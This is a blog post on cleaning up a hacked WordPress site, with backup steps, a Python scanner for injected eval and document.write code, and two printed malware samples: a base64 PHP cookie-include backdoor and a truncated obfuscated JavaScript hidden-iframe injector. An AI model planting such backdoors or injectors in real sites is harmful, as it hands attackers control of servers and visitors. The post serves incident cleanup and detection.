Talking about WordPress.
The last time my blog was hacked was… let me remember… uh… yesterday.
But hackers have known my blog for quite a long time, and they even got it marked by Google as a site that may harm your computer.
Never mind, all these attacks gave me some experience about the typical WordPress hack.
So, when you realize your blog has been hacked, follow these steps:
Back up your FTP content
Simply open your favorite FTP client and download all the content of your site.
Back up your MySQL database
Every decent hosting plan now supports phpMyAdmin. With this tool you can export and save your entire database in a matter of seconds (or minutes, depending on the size of your DB).
With your WP database selected, click on Export (1).
On the next page, remember to:
1) Have all tables selected
2) Select SQL as database type
3) Check "Structure", "Add IF NOT EXISTS" and "Enclose table and field names with backquotes". Leave "Add AUTO_INCREMENT value" unchecked because WP tables already have an auto increment column
4) Check "Data", "Complete inserts", "Extended inserts" and "Use hexadecimal for BLOB"
5) Check "Save as file" and "None". Choosing "zipped" can be too CPU intensive for your hosting plan
Hunt for the virus
I experienced two types of viruses, both with code inserted into my WP files.
The first one is PHP code inserted in one page, like this one
eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30='));
that, once decoded, is
if(isset($_COOKIE["sh"])){include($_COOKIE["sh"]);exit;}
The second one is JavaScript code inserted in one page, like this one
var OymMAWPnBMGWAGuoPiVY = "q60q105q102q114q97q109q101q32q119q105q100q116q104q61q34q52q56q48q34q32q104q101q105q103q104q116q61q34q54q48q34q32q115q114q99q61q34q104q116q116q112q58q47q47q105q108q111q118q101q104q97q115q104q46q99q110q47q114q97q115q116q97q116q100q115q47q103q111q46q112q104q112q63q115q105q100q61q53q34q32q115q116q121q108q101q61q34q98q111q114q100q101q114q58q48q112q120q59q32q112q111q115q105q116q105q111q110q58q114q101q108q97q116q105q118q101q59q32q116q111q112q58q48q112q120q59q32q108q101q102q116q58q45q53q48q48q112q120q59q32q111q112q97q99q105q116q121q58q48q59q32q102q105q108q116q101q114q58q112q114q111q103q105q100q58q68q88q73q109q97q103q101q84q114q97q110q115q102q111q114q109q46q77q105q99q114q111q115q111q102q116q46q65q108q112q104q97q40q111q112q97q99q105q116q121q61q48q41q59q32q45q109q111q122q45q111q112q97q99q105q116q121q58q48q34q62q60q47q105q102q114q97q109q101q62";var LtBVGDCUsUSHTFUTcjHd = OymMAWPnBMGWAGuoPiVY.split("q");var wOAwUuljcGInzJIGNLaG = "";for (var gtNzyhTaRbENpEKKzvub=1; gtNzyhTaRbENpEKKzvub
that once evaluated returns
I got some more similar code injected into my pages, but all of it was inserted at the end of the page, in the last row.
So you should search for eval or document.write and see if there are strange strings like the ones I got.
Then, delete them or comment them out and you should have your blog cleaned and virus-free.
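The search described above, as an added example that is not code from the original post: a small Python scanner for a local copy of the site that flags eval( and document.write( lines and decodes the two obfuscation shapes shown in this post so you can read what was injected. The function names, the 20-code threshold, the file suffixes and the sample file are assumptions made for the example.

```python
import base64
import re
from pathlib import Path

# eval(base64_decode('...')), the shape of the PHP injection shown above
PHP_EVAL = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
# a quoted run of 20+ decimal character codes joined by one letter, as in the JavaScript sample
CHARCODES = re.compile(r"['\"](([A-Za-z])\d{2,3}(?:\2\d{2,3}){19,})['\"]")
# any other eval( or document.write( call is only a candidate for manual review
LOOSE = re.compile(r"\beval\s*\(|\bdocument\.write\s*\(")

def scan_text(text):
    """Return (line_no, is_last_line, kind, detail) for every suspicious line."""
    lines, findings = text.splitlines(), []
    for no, line in enumerate(lines, 1):
        found = []
        for m in PHP_EVAL.finditer(line):
            try:
                detail = base64.b64decode(m.group(1)).decode("utf-8", "replace")
            except ValueError:  # bad padding or alphabet
                detail = "<undecodable base64>"
            found.append(("php-eval-base64", detail))
        for m in CHARCODES.finditer(line):
            codes = [int(c) for c in m.group(1).split(m.group(2)) if c]
            found.append(("js-charcodes", "".join(chr(c) for c in codes)))
        if not found and LOOSE.search(line):
            found.append(("manual-review", line.strip()[:80]))
        findings.extend((no, no == len(lines), k, d) for k, d in found)
    return findings

def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Scan a local copy of the site (for example the FTP backup) file by file."""
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            for finding in scan_text(path.read_text(encoding="utf-8", errors="replace")):
                yield (str(path), *finding)

# Constructed sample file: a normal template line, then two injected lines at the end.
HIDDEN = '<iframe src="http://example.invalid/"></iframe>'  # placeholder payload
SAMPLE = "\n".join([
    "<?php get_footer(); ?>",
    "<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30=')); ?>",
    '<script>var s = "q' + "q".join(str(ord(c)) for c in HIDDEN) + '";document.write(s);</script>',
])

if __name__ == "__main__":
    for finding in scan_text(SAMPLE):
        print(finding)
```

Lines tagged manual-review are common in legitimate plugins and themes, so treat them as a list to read through rather than as confirmed injections.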
I am thinking about making a plugin that does all this hard work for you. At the moment the only existing one seems to be WordPress Exploit Scanner, but I would like something more complete.